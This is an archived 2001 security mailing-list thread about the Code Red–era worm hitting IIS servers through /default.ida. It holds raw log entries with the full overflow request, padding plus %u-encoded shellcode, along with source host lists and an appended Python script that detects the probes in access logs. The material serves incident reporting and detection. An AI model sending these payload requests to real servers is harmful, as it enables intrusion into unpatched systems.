[unisog] ida worm (fwd)

Bencsath Boldizsar boldi at budapest.hu
Thu Jul 19 20:30:50 GMT 2001


Tons of them on all servers (low traffic ones too...)
The first could be 63.64.108.6 - - [19/Jul/2001:16:46:20 +0200]


65.164.0.68 - - [19/Jul/2001:17:56:22 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
" 400 327 "-" "-"
209.195.169.242 - - [19/Jul/2001:17:57:52 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6
858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
...
some hostnames:
63.64.108.6--[19/Jul/2001:16:46:20
www.carle.com--[19/Jul/2001:18:22:34
ip-90-027.gst.pe.net--[19/Jul/2001:18:47:08
65.4.216.136--[19/Jul/2001:19:03:48
dsl-641491397.internetconnect.net--[19/Jul/2001:19:15:22
nr12-216-196-181-11.fuse.net--[19/Jul/2001:20:05:36
www.kclifesciences.org--[19/Jul/2001:20:07:46
cm030.167.234.24.lvcm.com--[19/Jul/2001:20:39:20
dyn-213-36-2-65.ppp.libertysurf.fr--[19/Jul/2001:20:56:03
208.239.158.118--[19/Jul/2001:21:18:28
61.128.97.77--[19/Jul/2001:22:14:38


--------------------------------
Bencsath Boldizsar
boldi at etl.hu
--------------------------------

On Thu, 19 Jul 2001, Russ Harvey wrote:

>
> http://www.eeye.com/html/Research/Advisories/AD20010618.html
>
> We're getting hit with a ton of these, and the source IPs seem all over
> the map:
>
> Thu Jul 19 08:33:06    HTTP request from 207.46.239.116: GET /default.ida?NN...
> Thu Jul 19 08:53:17    HTTP request from 211.220.44.29: GET /default.ida?NN...
> Thu Jul 19 09:26:38    HTTP request from 63.237.136.164: GET /default.ida?NN...
> Thu Jul 19 09:33:14    HTTP request from 217.12.96.66: GET /default.ida?NN...
> Thu Jul 19 10:00:43    HTTP request from 210.218.214.10: GET /default.ida?NN...
> Thu Jul 19 10:05:05    HTTP request from 63.165.102.41: GET /default.ida?NN...
> Thu Jul 19 10:40:26    HTTP request from 66.1.160.222: GET /default.ida?NN...
> Thu Jul 19 10:51:14    HTTP request from 61.155.18.78: GET /default.ida?NN...
> Thu Jul 19 10:51:53    HTTP request from 211.173.199.28: GET /default.ida?NN...
> Thu Jul 19 11:01:18    HTTP request from 216.114.79.35: GET /default.ida?NN...
> Thu Jul 19 11:01:57    HTTP request from 209.113.64.211: GET /default.ida?NN...
>
> Anyone else getting barraged?
>
> Thanks,
> --russ
>
> -------------------------------------------------------------------------------
> Russ Harvey                             Internet: russ-harvey at ucr.edu
> Dept. of Computing and Communications       uucp: galaxy!russ
> Univ. of Calif., Riverside, CA 92521-0142  phone: (909) 787-5617
>
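
Added example, not part of either message above: one way to pull requests of this shape out of an Apache-style access log and list each source host with the time of its first probe, like the "some hostnames" list. The sample log is constructed (documentation addresses, shortened padding), and the function names and the 16-character filler threshold are assumptions.

```python
import re
from datetime import datetime

# Constructed sample log (documentation addresses, padding shortened); the
# first record is wrapped across lines the way the mailed excerpts are.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jul/2001:17:56:22 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u00=a
HTTP/1.0
" 400 327 "-" "-"
198.51.100.7 - - [19/Jul/2001:18:01:02 +0200] "GET /index.html HTTP/1.0" 200 512 "-" "-"
203.0.113.5 - - [19/Jul/2001:16:46:20 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 327 "-" "-"
192.0.2.10 - - [19/Jul/2001:19:10:00 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 327 "-" "-"
198.51.100.7 - - [19/Jul/2001:19:12:00 +0200] "GET /default.ida?CiRestriction=none HTTP/1.0" 404 200 "-" "-"
"""

RECORD_START = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "')
# /default.ida? + a run of >=16 identical filler chars + >=4 %uXXXX escapes
PROBE = re.compile(r'/default\.ida\?(.)\1{15,}.*?(?:%u[0-9a-f]{4}){4,}', re.I)

def records(text):
    """Rejoin wrapped lines: a record runs until the next record-start line."""
    buf = []
    for line in text.splitlines():
        if RECORD_START.match(line) and buf:
            yield "".join(buf)
            buf = []
        buf.append(line.strip())
    if buf:
        yield "".join(buf)

def first_seen(text):
    """Return [(host, first probe time)] sorted by time, one entry per host."""
    seen = {}
    for rec in records(text):
        m = RECORD_START.match(rec)
        if not m or not PROBE.search(rec):
            continue  # ordinary request, or an .ida query without the padding
        host = m.group(1)
        when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        if host not in seen or when < seen[host]:
            seen[host] = when
    return sorted(seen.items(), key=lambda kv: kv[1])

if __name__ == "__main__":
    for host, when in first_seen(SAMPLE_LOG):
        print(host, when.isoformat())
```
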



